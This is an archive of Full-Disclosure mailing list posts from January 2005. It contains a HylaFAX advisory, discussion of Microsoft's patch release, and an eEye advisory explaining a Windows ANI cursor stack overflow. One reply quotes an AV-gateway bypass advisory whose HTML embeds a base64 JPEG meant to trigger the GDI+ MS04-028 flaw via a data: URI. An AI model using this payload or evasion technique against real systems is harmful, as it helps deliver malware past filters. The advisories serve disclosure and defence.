Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

  Severity: Normal
     Title: HylaFAX: hfaxd unauthorized login vulnerability
      Date: January 11, 2005
      Bugs: #75941
        ID: 200501-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

HylaFAX is subject to a vulnerability in its username matching code,
potentially allowing remote users to bypass access control lists.

Background
==========

HylaFAX is a software package for sending and receiving facsimile
messages.

Affected packages
=================

Description
===========

The code used by hfaxd to match a given username and hostname with an
entry in the hosts.hfaxd file is insufficiently protected against
malicious entries.

Impact
======

If the HylaFAX installation uses a weak hosts.hfaxd file, a remote
attacker could authenticate using a malicious username or hostname and
bypass the intended access restrictions.

Workaround
==========

As a workaround, administrators may consider adding passwords to all
entries in the hosts.hfaxd file.

Resolution
==========

All HylaFAX users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/hylafax-4.2.0-r2"

Note: Due to heightened security, weak entries in the hosts.hfaxd file
may no longer work. Please see the HylaFAX documentation for details of
accepted syntax in the hosts.hfaxd file.

References
==========

  [ 1 ] CAN-2004-1182
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1182
  [ 2 ] HylaFAX Announcement
        http://marc.theaimsgroup.com/?l=hylafax&m=110545119911558&w=2

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200501-21.xml

Concerns?
=========

License
=======

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

application/pgp-signature attachment: OpenPGP digital signature

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

From: James Patterson Wicks (pwicksoxygen.com)
Date: Tue Jan 11 2005 - 10:55:41 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

It's just 8:55 on the West Coast. Let Bill get a cup of coffee and
check his email first! :)

-----Original Message-----
From: full-disclosure-bounceslists.netsys.com
[mailto:full-disclosure-bounceslists.netsys.com] On Behalf Of Vincent
Archer
Sent: Tuesday, January 11, 2005 11:11 AM
To: Mike Diack
Cc: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] I thought Microsoft were releasing new
security patches today (11 Jan 2005)?

On Tue, Jan 11, 2005 at 03:13:45PM -0000, Mike Diack wrote:
> Where are they?
> Mike

Thursday usually, not tuesday?

--
Vincent ARCHER
varcherdenyall.com

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

From: James Patterson Wicks (pwicksoxygen.com)
Date: Tue Jan 11 2005 - 11:11:42 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

The updates are scheduled to come out today.

>From Microsoft:
http://www.microsoft.com/technet/security/bulletin/advance.mspx

Microsoft Security Bulletin Advance Notification
On January 11, 2005, the Microsoft Security Response Center is
planning to release:

*
3 Microsoft Security Bulletins affecting Microsoft Windows. The
greatest maximum severity rating for these security updates is
Critical. These security updates may require a restart.

No additional details about bulletin severities or
vulnerabilities will be made available until January 11, 2005.

If you have Windows in your environment, you should subscribe to the
advanced notification service. Helps you plan for downtime.

-----Original Message-----
From: full-disclosure-bounceslists.netsys.com
[mailto:full-disclosure-bounceslists.netsys.com] On Behalf Of Matt
Ostiguy
Sent: Tuesday, January 11, 2005 11:07 AM
To: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] I thought Microsoft were releasing new
security patches today (11 Jan 2005)?

On Tue, 11 Jan 2005 15:13:45 -0000, Mike Diack <mike_diackhotmail.com>
wrote:
> Where are they?
> Mike
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

My experience has been that the 2nd tuesday of the month patch drop
occurs late in the day or evening, Eastern Standard Time.

Matt
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

From: ASB (abakergmail.com)
Date: Tue Jan 11 2005 - 11:30:17 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Yeah, because everyone is a kernel developer.

To answer the original question, the patches are released approx 1pm
EST on the 2nd Tuesday of each month.

-ASB
FAST, CHEAP, SECURE: Pick Any TWO
http://www.ultratech-llc.com/KB/

On Tue, 11 Jan 2005 17:38:09 +0100, vh <vhhelith.net> wrote:
> On Tue, 11 Jan 2005 15:13:45 -0000
> "Mike Diack" <mike_diackhotmail.com> wrote:
>
> > Where are they?
> > Mike
>
> Start using OpenSource-OSs then you would be able to write the patches
> yourself if nobody cares for the security-holes.
> Microsoft don't care for ANY guy who buy an MS-OS if this guy is no CEO
> or any other person of any big company.
>
> Don't count the patches...
> Count the security holes they didn't patched.
>
>
> vH
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] FW: MS Antispyware makes deal to leave Weatherbug alone

From: Todd Towles (toddtowlesbrookshires.com)
Date: Tue Jan 11 2005 - 11:16:33 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

And the money payoff begins..

> -----Original Message-----
> From: jaynine [mailto:jaynine_txearthlink.net]
> Sent: Tuesday, January 11, 2005 6:48 AM
> To: Patch Management Mailing List
> Subject: MS Antispyware makes deal to leave Weatherbug alone
>
> I read this rather disturbing article on another tech list.
> Pardon me if someone here has already made reference to it.
>
> --- j9
>
> http://netrn.net/spywareblog/archives/2005/01/07/adware-vs-microsoft/
>
> 1/7/2005
> Adware vs. Microsoft
>
> It's started folks. WeatherBug Miffed at Microsoft's Spyware
> Classification .
>
> Microsoft Corp.'s newly released anti-spyware is flagging a
> component of AWS Convergence Technologies' WeatherBug
> application as a threat to Windows users, prompting an
> immediate complaint from the Gaithersburg, Md.-based company.
>
> It appears this dispute has been resolved already: A
> Microsoft spokeswoman said the beta product included a vendor
> dispute-resolution mechanism to deal with complaints from
> third-party companies.
>
> In the case of WeatherBug, the dispute-resolution process
> paid immediate dividends. On Friday, the company received a
> response from Microsoft with the good news that the current
> signatures for Minibug will be removed.
>
>
>
>
>
> ---
> To unsubscribe send a blank email to
> leave-patchmanagementpatchmanagement.org
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

From: Micheal Espinola Jr (michealespinolagmail.com)
Date: Tue Jan 11 2005 - 11:20:03 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Nope, its the typically the 2nd Tuesday of the month. Also, they are
PST. Myself being EST, I dont expect to see anything until
mid-afternoon.

MS did pre-announce that there would be a release today. You can
verify this on the web site.

On Tue, 11 Jan 2005 17:11:17 +0100, Vincent Archer <vardeny-all.com> wrote:
> On Tue, Jan 11, 2005 at 03:13:45PM -0000, Mike Diack wrote:
> > Where are they?
> > Mike
>
> Thursday usually, not tuesday?
>
> --
> Vincent ARCHER
> varcherdenyall.com
>
> Tel : +33 (0)1 40 07 47 14
> Fax : +33 (0)1 40 07 47 27
> Deny All - 5, rue Scribe - 75009 Paris - France
> www.denyall.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

--
ME2

rss: <http://www.santeriasys.net/rss.xml>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

From: Danny (nocmonkeygmail.com)
Date: Tue Jan 11 2005 - 10:50:53 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Tue, 11 Jan 2005 15:13:45 -0000, Mike Diack <mike_diackhotmail.com> wrote:
> Where are they?

They are probably patching their patch release system. :)

Expect them in a couple of hours. Patience grasshopper, patience...

...D
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] I thought Microsoft were releasing new secu rity patches today (11 Jan 2005)?

From: Randal, Phil (prandalherefordshire.gov.uk)
Date: Tue Jan 11 2005 - 11:21:35 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Looking at

http://www.microsoft.com/downloads/results.aspx?sortCriteria=date&freete
xt=security

should reveal all.

The Security Bulletins and KB articles aren't up yet, though.

Phil
----
Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK

> -----Original Message-----
> From: full-disclosure-bounceslists.netsys.com
> [mailto:full-disclosure-bounceslists.netsys.com] On Behalf
> Of James Patterson Wicks
> Sent: 11 January 2005 16:56
> Cc: full-disclosurelists.netsys.com
> Subject: RE: [Full-Disclosure] I thought Microsoft were
> releasing new security patches today (11 Jan 2005)?
>
> It's just 8:55 on the West Coast. Let Bill get a cup of
> coffee and check his email first! :)
>
>
> -----Original Message-----
> From: full-disclosure-bounceslists.netsys.com
> [mailto:full-disclosure-bounceslists.netsys.com] On Behalf
> Of Vincent Archer
> Sent: Tuesday, January 11, 2005 11:11 AM
> To: Mike Diack
> Cc: full-disclosurelists.netsys.com
> Subject: Re: [Full-Disclosure] I thought Microsoft were
> releasing new security patches today (11 Jan 2005)?
>
> On Tue, Jan 11, 2005 at 03:13:45PM -0000, Mike Diack wrote:
> > Where are they?
> > Mike
>
> Thursday usually, not tuesday?
>
> --
> Vincent ARCHER
> varcherdenyall.com
>
> Tel : +33 (0)1 40 07 47 14
> Fax : +33 (0)1 40 07 47 27
> Deny All - 5, rue Scribe - 75009 Paris - France www.denyall.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
> This e-mail is the property of Oxygen Media, LLC. It is
> intended only for the person or entity to which it is
> addressed and may contain information that is privileged,
> confidential, or otherwise protected from disclosure.
> Distribution or copying of this e-mail or the information
> contained herein by anyone other than the intended recipient
> is prohibited. If you have received this e-mail in error,
> please immediately notify us by sending an e-mail to
> postmasteroxygen.com and destroy all electronic and paper
> copies of this e-mail.
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Microsoft AntiSpyware: Will it be free and Vulnerable

From: devis (deviseasynix.net)
Date: Tue Jan 11 2005 - 11:51:16 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Matt Ostiguy wrote:

>On Sat, 8 Jan 2005 10:12:23 -0600, RandallM <randallmfidmail.com> wrote:
>
>
>>I don't think it's going to be free. While doing a small amount of research
>>on the "spyware community" I found this text string in the
>>GianttAntiSpywareUpdater.exe:
>>
>>
>>
>
>Doesn't the fact that the executable's name contains a company that no
>longer exists (Giant) indicate that perhaps this BETA software will
>undergo some changes before its full release as a Microsoft product?
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>
>
Buahwuahwuahwuawa ... you have to be gullible to think that M$ will not
NOT cash on their own slack coding. Of course they will, now i suspect
they even will try to make it go as an added cost for the OEMs, so
consummers will pay transparently for one year signatures updates ... as
they do/did for OSes.
Remember .. they never had a choice in the first place, why would they now ?
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability

From: Jeff Gillian (jeff.gilliangmail.com)
Date: Tue Jan 11 2005 - 12:16:12 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Interesting. I tested a number of both Linux and Windows image
vulnerabilities that are all by default detected by my IronPort,
TippingPoint UnityOne and ISS Proventia appliances.

Using the technique you mentioned, they were ignored completely and delivered.
Additionally, there are appear to be several mail clients that support
that RFC, including Thunderbird so you can obviously target more than
just web browsers.

Jeff.

On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
<dboundsintrusense.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Multi-vendor AV gateway image inspection bypass vulnerability
> January 10, 2005
>
> A vulnerability has been discovered which allows a remote attacker to
> bypass anti-virus
> (as well other security technologies such as IDS and IPS) inspection of
> HTTP image content.
>
> By leveraging techniques described in RFC 2397 for base64 encoding
> image content within
> the URL scheme. A remote attack may encode a malicious image within the
> body of an HTML
> formatted document to circumvent content inspection.
>
> For example:
>
> http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
>
> The source code at the URL above will by default create a JPEG image
> that will attempt (and fail
> without tweaking) to exploit the Microsoft MS04-028 GDI+ vulnerability.
> The image itself is detected
> by all AV gateway engines tested (Trend, Sophos and McAfee), however,
> when the same image
> is base64 encoded using the technique described in RFC 2397 (documented
> below), inspection
> is not performed and is delivered rendered by the client.
>
> While Microsoft Internet Explorer does not support the RFC 2397 URL
> scheme; Firefox, Safari,
> Mozilla and Opera do and will render the data and thus successfully
> execute the payload if the necessary
> OS and/or application patches have not been applied.
>
> ## BEGIN HTML ##
>
> <html>
> <body>
> <img
> src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
> gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
> /X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/bAEMACAYGBwYFCAcHBwkJ
> CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv/b
> AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
> MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/xAAfAAABBQEBAQEBAQAAAAAAAAAA
> AQIDBAUGBwgJCgv/xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGR
> oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2Rl
> ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbH
> yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/xAAfAQADAQEBAQEBAQEBAAAAAAAA
> AQIDBAUGBwgJCgv/xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU
> QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNk
> ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8TF
> xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/APn+iiigD//
> Z">
> </body>
> </html>
>
> ## END HTML ##
>
> Solution:
>
> While AV vendor patches are not yet available, fixes for all currently
> known image vulnerabilities are
> and have been for several months. If you have not yet applied them,
> you have your own
> negligence to blame.
>
> Contributions:
>
> Thanks to Scott Roeder and Jacinto Rodriquez their assistance in
> platform testing.
>
> Thank you,
>
> Darren Bounds
> Intrusense, LLC.
> http://www.intrusense.com
>
> - --
> Intrusense - Securing Business As Usual
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.4 (Darwin)
>
> iD8DBQFB4tKesvxTSz2eaa8RAluUAKDmUsM6Hf+U321P/kALTC/rKwoLOwCfaK57
> XT6MWYJOH3FmLfV3B1UfuJA=
> =82yy
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] EEYE: Windows ANI File Parsing Buffer Overflow

From: Derek Soeder (dsoedereeye.com)
Date: Tue Jan 11 2005 - 12:20:47 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Windows ANI File Parsing Buffer Overflow

Systems Affected:
Windows Me
Windows 2000
Windows XP (SP1 and earlier)
Windows 2003

Overview:
eEye Digital Security has discovered a vulnerability in USER32.DLL's
handling of Windows animated cursor (.ani) files that will allow a
remote attacker to reliably overwrite the stack with arbitrary data and
execute arbitrary code.

Because Windows animated cursors can be supplied for use by Internet
Explorer, this vulnerability affects any applications that use the
Internet Explorer component internally, such as Internet Explorer
itself, Word, Excel, PowerPoint, Outlook, Outlook Express, and so on, as
well as the Windows shell.

In the case of Internet Explorer, the user's system will be compromised
when the user views a website that shows a malformed ANI file referenced
via a style sheet in the HTML file. Likewise, a system may be
compromised through Outlook and Outlook Express when the user tries to
read an HTML e-mail containing a MIME-encoded malformed ANI file and a
style sheet referencing the encoded ANI file, invoked using HTML such as
< BODY style="CURSOR: url('cid:xxxx')" >. In the case of the Windows
shell (explorer.exe), exploitation occurs when the user opens a folder
containing a malformed ANI file.

This vulnerability also exists in all obsolete versions of the Windows
operating system (Windows 95/98/NT4).

Technical Details:
The buffer overflow bug exists in a part of USER32.DLL involved in
handling ANI animated cursor files. A partial ANI file format is given
below:

"RIFF" {(DWORD)Length_of_file}
"ACON"
"LIST" {(DWORD)Length_of_list}
"INFO"
"INAM" {(DWORD)Length_of_title} {szTitle}
"IART" {(DWORD)Length_of_author} {szAuthor}
"anih" {(DWORD)Length_of_AnimationHeader} {AnimationHeaderBlock}

Generally, the length of AnimationHeaderBlock shoule be 36 bytes
(0x00000024). The vulnerability is in the handling of the
Length_of_AnimationHeader field. This value will be passed as the length
argument of memcpy(), in order to copy the contents of
AnimationHeaderBlock, but the value is not checked appropriately. The
buffer intended to hold the AnimationHeaderBlock is located on the
stack, so we can overwrite the return address and exception handler on
the stack and jump into the buffer containing our code.

This vulnerability is a separate vulnerability from the ones discovered
by Xfocus.

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.

Vendor Status:
Microsoft has released a patch for this vulnerability. The patch is
available at:
http://www.microsoft.com/technet/security/bulletin/MS05-002.mspx

Credit:
Yuji Ukai

Related Links:
Retina Network Security Scanner - Free 15 Day Trial
http://www.eeye.com/html/Products/Retina/download.html

Greetings:
eEye Geneva and UK guys, Retina Japanese edition team, TEXTEX (hey
watzup!!) , Manma Kanrakuzaka - Okinawa Cuisine (Tomato salad tastes
good)

Copyright (c) 1998-2005 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
alerteEye.com for permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] I thought Microsoft were releasing new security patches today (11 Jan 2005)?

From: KF (lists) (kf_listsdigitalmunition.com)
Date: Tue Jan 11 2005 - 12:48:41 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Ok folks the damn sky IS NOT falling.

I just checked my SUS install and I have 10 new updates... so should you.

so lets all just FREAK OUT!#$!#
-KF

Micheal Espinola Jr wrote:

>Nope, its the typically the 2nd Tuesday of the month. Also, they are
>PST. Myself being EST, I dont expect to see anything until
>mid-afternoon.
>
>MS did pre-announce that there would be a release today. You can
>verify this on the web site.
>
>
>On Tue, 11 Jan 2005 17:11:17 +0100, Vincent Archer <vardeny-all.com> wrote:
>
>
>>On Tue, Jan 11, 2005 at 03:13:45PM -0000, Mike Diack wrote:
>>
>>
>>>Where are they?
>>>Mike
>>>
>>>
>>Thursday usually, not tuesday?
>>
>>--
>>Vincent ARCHER
>>varcherdenyall.com
>>
>>Tel : +33 (0)1 40 07 47 14
>>Fax : +33 (0)1 40 07 47 27
>>Deny All - 5, rue Scribe - 75009 Paris - France
>>www.denyall.com
>>
>>_______________________________________________
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.netsys.com/full-disclosure-charter.html
>>
>>
>>
>
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] I thought Microsoft were releasing new securitypatches today (11 Jan 2005)?

From: Handy, Mark (IT) (Mark.Handymorganstanley.com)
Date: Tue Jan 11 2005 - 12:56:50 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

These are now out as MS05-001/2/3

-----Original Message-----
From: full-disclosure-bounceslists.netsys.com
[mailto:full-disclosure-bounceslists.netsys.com] On Behalf Of Micheal
Espinola Jr
Sent: 11 January 2005 12:20
To: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] I thought Microsoft were releasing new
securitypatches today (11 Jan 2005)?

Nope, its the typically the 2nd Tuesday of the month. Also, they are
PST. Myself being EST, I dont expect to see anything until
mid-afternoon.

MS did pre-announce that there would be a release today. You can verify
this on the web site.

On Tue, 11 Jan 2005 17:11:17 +0100, Vincent Archer <vardeny-all.com>
wrote:
> On Tue, Jan 11, 2005 at 03:13:45PM -0000, Mike Diack wrote:
> > Where are they?
> > Mike
>
> Thursday usually, not tuesday?
>
> --
> Vincent ARCHER
> varcherdenyall.com
>
> Tel : +33 (0)1 40 07 47 14
> Fax : +33 (0)1 40 07 47 27
> Deny All - 5, rue Scribe - 75009 Paris - France www.denyall.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

--
ME2

rss: <http://www.santeriasys.net/rss.xml>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
--------------------------------------------------------

NOTICE: If received in error, please destroy and notify sender. Sender does not waive confidentiality or privilege, and use is prohibited.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] PoC to be released on 01/20/05

From: Exibar (exibarthelair.com)
Date: Tue Jan 11 2005 - 12:46:56 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I'm goign to spend double what I usually spend that day, and maybe buy a big screen TV just to piss people like you off....

  this is not the list for that crap, take it somewhere else...
  ----- Original Message -----
  From: Some User
  To: full-disclosurelists.netsys.com
  Sent: Monday, January 10, 2005 9:13 PM
  Subject: [Full-Disclosure] PoC to be released on 01/20/05